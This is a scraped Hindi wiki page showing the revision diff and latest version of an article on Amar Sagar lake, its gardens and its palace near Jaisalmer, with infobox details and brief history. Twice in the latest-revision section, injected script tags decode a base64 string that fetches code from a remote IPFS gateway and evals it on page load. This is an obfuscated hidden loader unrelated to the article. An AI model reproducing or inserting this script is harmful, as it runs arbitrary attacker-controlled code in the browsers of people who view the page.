Difference between revisions of "अमरसागर जैसलमेर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(10 intermediate revisions by 4 users not shown)
Line 1: Line 1:
 
{{सूचना बक्सा पर्यटन
 
{{सूचना बक्सा पर्यटन
|चित्र=Amar-Sagar-Palace.jpg
+
|चित्र=Amar-Sagar-Lake-Jaisalmer.jpg
|चित्र का नाम=
+
|चित्र का नाम=अमरसागर, जैसलमेर
|विवरण=अमरसागर महल
+
|विवरण=जैसलमेर के अमरसागर तालाब और उसके उद्यान [[लौद्रवा जैसलमेर|लौद्रवा]] के रास्ते में जैसलमेर से पाँच किलोमीटर दूर स्थित हैं। 
|राज्य=राजस्थान
+
|राज्य=[[राजस्थान]]
 
|केन्द्र शासित प्रदेश=
 
|केन्द्र शासित प्रदेश=
|ज़िला=जैसलमेर
+
|ज़िला=[[जैसलमेर]]
 
|निर्माता=महारावल अखै सिंह
 
|निर्माता=महारावल अखै सिंह
 
|स्वामित्व=
 
|स्वामित्व=
Line 15: Line 15:
 
|प्रसिद्धि=झील और अमरसिंह महल
 
|प्रसिद्धि=झील और अमरसिंह महल
 
|कब जाएँ=[[अक्टूबर]] से [[मार्च]]
 
|कब जाएँ=[[अक्टूबर]] से [[मार्च]]
|यातायात=ऑटो रिक्शा या टॅक्सी
+
|यातायात=ऑटो रिक्शा या टैक्सी
 
|हवाई अड्डा=जैसलमेर हवाई अड्डा
 
|हवाई अड्डा=जैसलमेर हवाई अड्डा
 
|रेलवे स्टेशन=जैसलमेर रेलवे स्टेशन
 
|रेलवे स्टेशन=जैसलमेर रेलवे स्टेशन
 
|बस अड्डा=बस अड्डा जैसलमेर
 
|बस अड्डा=बस अड्डा जैसलमेर
|कैसे पहुँचें=ऑटो रिक्शा या टॅक्सी
+
|कैसे पहुँचें=ऑटो रिक्शा या टैक्सी
 
|क्या देखें=झील और अमरसिंह महल  
 
|क्या देखें=झील और अमरसिंह महल  
 
|कहाँ ठहरें=
 
|कहाँ ठहरें=
Line 35: Line 35:
 
|अन्य जानकारी=
 
|अन्य जानकारी=
 
|बाहरी कड़ियाँ=
 
|बाहरी कड़ियाँ=
|अद्यतन={{अद्यतन|15:33, 23 अगस्त 2011 (IST)}}
+
|अद्यतन=
 
}}
 
}}
 
*[[जैसलमेर]] [[राजस्थान]] का सबसे ख़ूबसूरत शहरों में है और [[जैसलमेर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है। यहाँ विदेशी पर्यटक बहुत आते हैं।  
 
*[[जैसलमेर]] [[राजस्थान]] का सबसे ख़ूबसूरत शहरों में है और [[जैसलमेर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है। यहाँ विदेशी पर्यटक बहुत आते हैं।  
*जैसलमेर के अमरसागर तालाब और उसके उद्यान लौद्रवा के रास्ते में जैसलमेर से पाँच किलोमीटर दूर स्थित हैं।   
+
*जैसलमेर के अमरसागर तालाब और उसके उद्यान [[लौद्रवा जैसलमेर|लौद्रवा]] के रास्ते में जैसलमेर से पाँच किलोमीटर दूर स्थित हैं।   
 +
*जैसलमेर से लगभग सात किलोमीटर पश्चिम दिशा में अमरसागर महल स्थित है जो बहुत प्रसिद्ध है।
 
*सन 1871 में 'बाफना हिम्मत राम' ने तालाब के किनारे सुन्दर [[जैन]] मंदिर स्थापित कराया था।  
 
*सन 1871 में 'बाफना हिम्मत राम' ने तालाब के किनारे सुन्दर [[जैन]] मंदिर स्थापित कराया था।  
 
*अमरसागर का निर्माण महारावल [[अमरसिंह]] ने विक्रमी संवत 1748 में कराया था।
 
*अमरसागर का निर्माण महारावल [[अमरसिंह]] ने विक्रमी संवत 1748 में कराया था।
  
  
{{लेख प्रगति
+
{| width="100%"
|आधार=
+
|-
|प्रारम्भिक=प्रारम्भिक3
+
|
|माध्यमिक=  
+
==चित्र वीथिका==
|पूर्णता=
+
<gallery>
|शोध=
+
चित्र:Amar-Sagar-Palace.jpg|अमरसागर महल, [[जैसलमेर]]
}}
+
चित्र:Amar-Sagar-Lake-Jaisalmer-1.jpg|अमरसागर, [[जैसलमेर]]
 +
</gallery>
 +
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
 
 
[[Category:जैसलमेर]]
 
[[Category:जैसलमेर]]
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 
[[Category:पर्यटन_कोश]]
 
[[Category:पर्यटन_कोश]]
 +
|}
 
__INDEX__ 
 
__INDEX__ 

Latest revision as of 09:07, 8 September 2018

amarasagar jaisalamer
vivaran jaisalamer ke amarasagar talab aur usake udyan laudrava ke raste mean jaisalamer se paanch kilomitar door sthit haian.
rajy rajasthan
zila jaisalamer
nirmata maharaval akhai sianh
nirman kal 17vian shatabdi
marg sthiti 7 kimi jaisalamer se pashchim mean
prasiddhi jhil aur amarasianh mahal
kab jaean aktoobar se march
kaise pahuanchean aauto riksha ya taiksi
havaee adda jaisalamer havaee adda
relave steshan jaisalamer relave steshan
bas adda bas adda jaisalamer
yatayat aauto riksha ya taiksi
kya dekhean jhil aur amarasianh mahal
es.ti.di. kod 02992 (jaisalamer)
chitr:Map-icon.gif havaee adda (googal)
sanbandhit lekh jaisalamer ka qila haveliyaan


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • jaisalamer rajasthan ka sabase khoobasoorat shaharoan mean hai aur jaisalamer paryatan ka sabase akarshak sthal mana jata hai. yahaan videshi paryatak bahut ate haian.
  • jaisalamer ke amarasagar talab aur usake udyan laudrava ke raste mean jaisalamer se paanch kilomitar door sthit haian.
  • jaisalamer se lagabhag sat kilomitar pashchim disha mean amarasagar mahal sthit hai jo bahut prasiddh hai.
  • san 1871 mean 'baphana himmat ram' ne talab ke kinare sundar jain mandir sthapit karaya tha.
  • amarasagar ka nirman maharaval amarasianh ne vikrami sanvat 1748 mean karaya tha.


chitr vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>